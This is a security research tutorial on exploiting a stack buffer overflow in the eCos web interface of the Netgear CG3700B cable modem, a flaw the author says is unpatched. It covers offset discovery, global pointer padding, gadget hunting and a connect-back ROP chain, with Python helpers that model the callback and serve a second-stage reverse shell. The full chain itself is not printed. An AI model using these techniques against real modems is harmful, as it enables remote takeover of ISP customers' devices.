In this article I’ll introduce a methodology and corresponding techniques that you can use to exploit buffer overflows on the Broadcom variant of eCos.
I’ll demonstrate the methodology by exploiting a stack buffer overflow that affects the Netgear CG3700B device. This is a forever-day, given that Netgear refused to fix it when asked by a major Belgian ISP. You can read more about the bug here.
Reproducing the Bug
The buffer overflow affects the authenticated part of the device’s management web interface. A reduced test case is provided below:
Broadcom-based cable modems running eCos that are deployed by ISPs run production builds, which means they do not expose debugging stubs over TCP or serial. (GDB stubs can be enabled when building eCos images, and are then exposed over serial or TCP either by the firmware itself or by the RedBoot bootloader.)
However, every firmware that relies on Broadcom Foundation Classes has a custom exception handler that triggers on segmentation faults. This exception handler prints out all MIPS registers, the current instruction, and the affected thread. Given that these devices only support one simultaneous console connection, the dump is printed on whichever interface you’re currently connected to (i.e. serial if you’re connected over UART, telnet if you’re connected over TCP).
If we send the reduced test case from above, we’ll get the following dump printed out:
As we can see, we successfully overwrote the return address with the content from our buffer (0x41414141).
Identifying Buffer Length
In order to know how much padding is required to overflow the buffer, we will use gef “pattern create” and “pattern search”.
Let’s trigger the crash with this pattern:
We see the crash happening when the device tries to execute the instruction at 0x6c616163:
We can now find the offset by searching through our pattern.
Now we know that our exploit payload will need 244 bytes of padding in order to overflow the buffer and take control of the program counter.
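As a cross-check that does not require GEF, the offset lookup can be sketched in plain Python. This is an illustration rather than GEF's own code: it generates the classic de Bruijn pattern over lowercase letters (assumed here to be the same sequence that "pattern create" emits for a 32-bit target) and searches it for the faulting address, interpreted as big-endian bytes. The function names are hypothetical.

```python
import itertools
import string
import struct


def de_bruijn(alphabet, n):
    """Yield the symbols of a de Bruijn sequence in which every
    n-character window over `alphabet` appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """Return the first `length` bytes of the pattern."""
    symbols = itertools.islice(de_bruijn(string.ascii_lowercase, n), length)
    return "".join(symbols).encode()


def cyclic_find(value, n=4, max_length=0x2000):
    """Return the offset of a 32-bit register value in the pattern, or -1.

    Assumption: the target is big-endian, so the register value maps
    directly onto the bytes as they were sent."""
    needle = struct.pack(">I", value)
    return cyclic(max_length, n).find(needle)


if __name__ == "__main__":
    print(cyclic_find(0x6C616163))
```

Under these assumptions the lookup for 0x6c616163 (the bytes "laac") lands on offset 244, which matches the padding length quoted above.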
Designing the Exploit Chain
Given the lack of debugging abilities on this platform (with the exception of register dump on segfault), the best strategy is to craft a very small ROP chain (stage 1) that will fetch or receive a second stage that we can compile for our target. This way we don’t have to debug an overly long chain by constantly crashing/capturing output/rebooting in order to do everything via return oriented programming.
This is exactly what folks at Lyrebird did when exploiting the CableHaunt vulnerability on Sagemcom devices.
The way their exploit works is:
Hijack the return address via the overflow and start the ROP chain.
The ROP chain establishes a TCP connection to a remote server and saves a reference to the file descriptor of this TCP connection socket at a fixed address.
The ROP chain reads shellcode from the remote server over the TCP connection and writes it in memory at a fixed address.
The ROP chain finally jumps to the shellcode’s first instruction.
The shellcode creates a console object (similar to calling /bin/sh on Linux) and redirects IO to the file descriptor by fetching its reference from the fixed address the ROP chain used. This way, the socket that was used to fetch the shellcode will be kept open and used for the reverse shell communication.
Brilliant, right?
Building a ROP Chain
Prerequisites
To build our ROP chain, we need to know the exact addresses of these standard functions within the firmware:
socket - create an endpoint for communication
connect - initiate a connection on a socket
recv - receive a message from a socket
sleep - delay for a specified amount of time
All these functions are part of the standard eCos libraries bundled with the Broadcom variant. Reverse engineering firmware images to identify these functions is covered in eCos Firmware Analysis with Ghidra.
We also need to choose fixed addresses in memory where we will store content. Namely:
sockfd_addr - stores a reference to the socket file descriptor
sockaddr_addr - stores a reference to a sockaddr structure
payload_buffer_addr - start address where to write shellcode
I personally always choose between two techniques: writing to the stack region of a thread whose stability will not put the device at risk (e.g. IkeThread on a device where IKE connectivity is not provided or used), or writing to the lowest memory addresses within the heap region, which are highly unlikely to be used by the system.
Handling Global Pointer Issues
One problem that may arise is that code will try to fetch content from or write content to memory addresses by relying on the global pointer ($gp) value while this value is corrupted due to our overflow. Say, for example, that you hit this instruction prior to actually taking control of $ra:
If the global pointer has been overwritten with ‘AAAA’, this will trigger an exception with code 5 “Address Error exception (Store)” and the device will crash because you’re trying to write to non-mapped memory.
The best, if not very elegant, way of overcoming this is to pad our payload with the global pointer value, so that whatever gets restored into $gp is still valid. If we know the global pointer is set to 0x86cfb884, we can fill our payload array like this:
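A minimal sketch of that padding, assuming a big-endian target, the 244-byte offset found earlier, and a buffer whose start is word-aligned with the saved $gp slot (the helper name is hypothetical):

```python
import struct

GP_VALUE = 0x86CFB884   # global pointer value quoted in the text
PADDING_LEN = 244       # offset to the saved return address found earlier


def gp_padding(length=PADDING_LEN, gp=GP_VALUE):
    """Return `length` bytes made of the global pointer repeated as
    big-endian 32-bit words, instead of a run of 'A' characters."""
    word = struct.pack(">I", gp)
    if b"\x00" in word:
        # A null byte would terminate the string before the overflow.
        raise ValueError("global pointer value contains a null byte")
    if length % 4:
        raise ValueError("padding length must be a multiple of 4")
    return word * (length // 4)


payload = gp_padding()
# The ROP chain words would be appended after this padding.
```

Because every padding word equals the original $gp, any saved-register slot that happens to be restored into $gp receives a usable value rather than 0x41414141.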
Finding Gadgets in Large Firmwares
I’m using Ropper to find gadgets, but it can take a while or even hang on large firmware files. The best way to speed up the process is to simply cut out a section with dd and run Ropper on it.
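For readers who prefer to stay in Python, the same carving step can be sketched as below. It mirrors what dd does with a skip offset and a byte count; the function name, file names, and offsets in the usage comment are hypothetical.

```python
def carve(src_path, dst_path, offset, size):
    """Copy `size` bytes starting at `offset` from src_path into dst_path.

    Returns the number of bytes actually written, which is smaller than
    `size` if the source file ends early."""
    with open(src_path, "rb") as src:
        src.seek(offset)
        chunk = src.read(size)
    with open(dst_path, "wb") as dst:
        dst.write(chunk)
    return len(chunk)


# Hypothetical usage: carve 1 MiB starting 2 MiB into the image.
# carve("firmware.bin", "chunk.bin", 0x200000, 0x100000)
```

Keep in mind that gadget offsets reported for the carved chunk are relative to the chunk, so the carve offset and the firmware load address both have to be added back before using them in the chain.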
Chain Design
Our objective with the ROP chain is to execute something similar to this piece of C code:
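The same sequence of calls can also be modelled in Python, which is handy for testing the serving side before touching the device. This is only a model of the intent, under the assumption that the chain performs socket, connect, recv, and sleep in that order; the function name and default values are illustrative, and the final jump into the received buffer has no Python equivalent.

```python
import socket
import time


def stage1_model(host, port, length=0x400, delay=2):
    """Mimic the first stage: connect back, read the second stage, wait."""
    # socket(AF_INET, SOCK_STREAM, 0), i.e. socket(2, 1, 0)
    sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    # connect(sockfd, &sockaddr, sizeof(sockaddr))
    sockfd.connect((host, port))
    # recv(sockfd, payload_buffer_addr, length, 0)
    payload = sockfd.recv(length)
    # sleep(delay): on the device this is where the caches get synced
    time.sleep(delay)
    # The real chain would now jump to payload_buffer_addr; here we just
    # hand back the open socket and the bytes that were received.
    return sockfd, payload
```

Returning the socket instead of closing it mirrors the design described earlier: the second stage reuses the same connection for the reverse shell.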
socket
Our target, like all devices running BCM33XX chipsets, runs on the MIPS architecture. The MIPS calling convention puts the first four arguments into $a0, $a1, $a2, and $a3 respectively. Remaining arguments are pushed onto the stack.
The first step is to create a socket to communicate over IPv4 (AF_INET) using TCP (SOCK_STREAM). This is the equivalent of calling socket(2, 1, 0).
To do so, we need to put the value 2 into $a0, 1 into $a1, and 0 into $a2.
Then, we need to call socket:
The MIPS calling convention also defines a register for return values: $v0. Once we return from calling socket, $v0 holds our file descriptor (an integer). We need to save it somewhere in memory, otherwise the trick of having the reverse shell reuse the channel that loaded it will not work.
connect
Since $a0 is already set to contain our sockfd, we just need to put the right values in $a1 and $a2.
To set up the sockaddr struct that $a1 points to, we first need to understand that struct.
The structure is better represented by the diagram below:
Here we have a problem because AF_INET must be encoded as \x00\x02, which contains a null byte. We cannot send null bytes in our payload because that would terminate the string, so we need to do some manipulation first.
The idea is to re-use data from the mapped firmware. We just have to identify a location in memory that starts with \x00\x02. The only caveat is that the TCP port it will connect to is arbitrary, corresponding to the two bytes that follow.
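To make the null-byte problem concrete, here is a small sketch that packs a sockaddr_in by hand. It assumes the conventional 16-byte layout (two bytes of family, two bytes of port, four bytes of IPv4 address, eight bytes of zero padding) in big-endian byte order; the IP address is a placeholder.

```python
import socket
import struct

AF_INET = 2  # encoded as \x00\x02 in the first two bytes


def build_sockaddr_in(ip, port):
    """Pack family, port, IPv4 address and padding into 16 bytes."""
    return struct.pack(
        ">HH4s8s",
        AF_INET,               # address family
        port,                  # TCP port, network byte order
        socket.inet_aton(ip),  # IPv4 address as 4 raw bytes
        b"\x00" * 8,           # zero padding
    )


sockaddr = build_sockaddr_in("192.168.0.10", 5504)  # placeholder address
print(sockaddr.hex())
print("contains null bytes:", b"\x00" in sockaddr)
```

The very first byte is already a null, which is why the structure cannot simply be embedded in the overflowing string.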
For this ROP chain, I’m using data from address 0x80010368, which means the TCP port will be 5504 (0x1580):
If you’re limited by firewall rules, the Python script below will help you find all occurrences in a given firmware, along with the corresponding TCP port, so you can select what works best for you.
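A minimal sketch of such a search is shown here. It is not the author's original script: it assumes a raw, decompressed firmware image, a big-endian target, and a load address that you supply yourself. It also skips addresses that contain a null byte, on the assumption that the address has to travel inside the payload. The names are hypothetical.

```python
import struct


def find_sockaddr_candidates(blob, base_addr):
    """Return (address, port) pairs for every \\x00\\x02 found in blob.

    The port is the big-endian 16-bit value that follows the marker."""
    results = []
    pos = blob.find(b"\x00\x02")
    while pos != -1 and pos + 4 <= len(blob):
        port = struct.unpack_from(">H", blob, pos + 2)[0]
        addr = base_addr + pos
        # Skip addresses that could not be sent in a null-free payload.
        if b"\x00" not in struct.pack(">I", addr):
            results.append((addr, port))
        pos = blob.find(b"\x00\x02", pos + 1)
    return results


# Hypothetical usage; the file name and load address are placeholders.
# with open("firmware.bin", "rb") as f:
#     for addr, port in find_sockaddr_candidates(f.read(), 0x80004000):
#         print(f"0x{addr:08x} -> TCP port {port}")
```

Filtering the output by port then gives a shortlist of addresses that fit whatever the firewall allows.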
Of course nothing blocks us from overwriting the value next to \x00\x02, but we have to be 100% sure that we are not patching instructions that would lead to the device crashing at some point.
The chain is explained in comments:
recv
Now it’s time to receive our second stage. We do so by calling recv while using the same sockfd reference, and a pointer to payload_buffer_addr, the fixed address we chose to save the shellcode in memory. I chose a length of 0x400 but feel free to choose anything else as long as it is larger than your shellcode size. The flags argument can be zero.
sleep
MIPS processors have an instruction cache and a data cache. The instruction cache can contain instructions that differ from the instructions stored in memory, causing so-called “cache incoherencies”.
I won’t cover the details here, just remember that we need to call sleep to sync the caches. The gadgets I’m using below will make the execution sleep for two seconds.
pivot
Finally, our second stage shellcode is saved at a fixed memory address and the caches are synced, so we’re ready to jump to the shellcode.
ROP Chain Reproduction
One interesting side effect of different firmware images being based on the same version of eCos (with the same libraries and constructs) is that we can be 99.9% sure that if we find a gadget in one firmware, it will be present in all the others.
Knowing this, we could imagine a tool that auto-generates a ROP chain given a firmware file and a buffer length.
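The first building block of such a tool could look like the sketch below: given the raw bytes of a gadget recorded from one firmware, locate the same byte sequence in another image. This is an assumption about how the tool might work, not an existing implementation. The signature used here is just the standard MIPS32 big-endian encoding of `jr $ra` followed by `nop`; a real tool would use the full byte sequence of each gadget in the chain.

```python
# jr $ra ; nop (MIPS32, big-endian), used purely as an example signature
JR_RA_NOP = bytes.fromhex("03e00008" "00000000")


def find_signature(blob, signature, base_addr):
    """Return the word-aligned addresses where `signature` occurs in blob."""
    hits = []
    pos = blob.find(signature)
    while pos != -1:
        if pos % 4 == 0:  # MIPS instructions are 4-byte aligned
            hits.append(base_addr + pos)
        pos = blob.find(signature, pos + 1)
    return hits


# Hypothetical usage; the file name and load address are placeholders.
# with open("other_firmware.bin", "rb") as f:
#     print([hex(a) for a in find_signature(f.read(), JR_RA_NOP, 0x80004000)])
```

Repeating this lookup for every gadget and function prologue in the chain, then re-packing the addresses behind the right amount of padding, would be the core of the generator.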
Serving the Payload
We can rely on pwntools to serve the second stage. The script below is directly inspired by Lyrebird’s code for exploiting the Sagemcom F@st 3890 (source).
Nothing too complex here. When the server receives the callback from our ROP chain, it returns the content of the file ‘exploit.raw’ (the second stage) and switches to interactive mode.
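If pwntools is not available, the serving half of that flow can be approximated with the standard library. The sketch below is a swapped-in alternative, not the pwntools script: it listens, accepts a single callback, sends the second stage, and returns the still-open connection. It does not implement the interactive mode, and the function names are hypothetical.

```python
import socket


def make_listener(port, host="0.0.0.0"):
    """Create a TCP socket listening on host:port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def serve_once(srv, payload):
    """Wait for one callback and send it the second stage.

    The connection is returned open because the shellcode reuses it
    for the reverse shell."""
    conn, peer = srv.accept()
    conn.sendall(payload)
    return conn, peer


# Hypothetical usage, with the port dictated by the bytes that follow
# \x00\x02 at the chosen address (5504 in this article):
# with open("exploit.raw", "rb") as f:
#     conn, peer = serve_once(make_listener(5504), f.read())
```

Any data the device sends afterwards arrives on `conn`, so a simple read and write loop on that socket is enough to talk to the console.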
Conclusion
In this article we covered how to exploit stack buffer overflows on the Broadcom variant of eCos. We learned how to reproduce a bug, identify the exact buffer length, and build a complete ROP chain manually.
In the process we learned a few tricks to overcome some limitations, such as analyzing large firmware files with Ropper or setting up the sockaddr structure by re-using existing bytes from memory.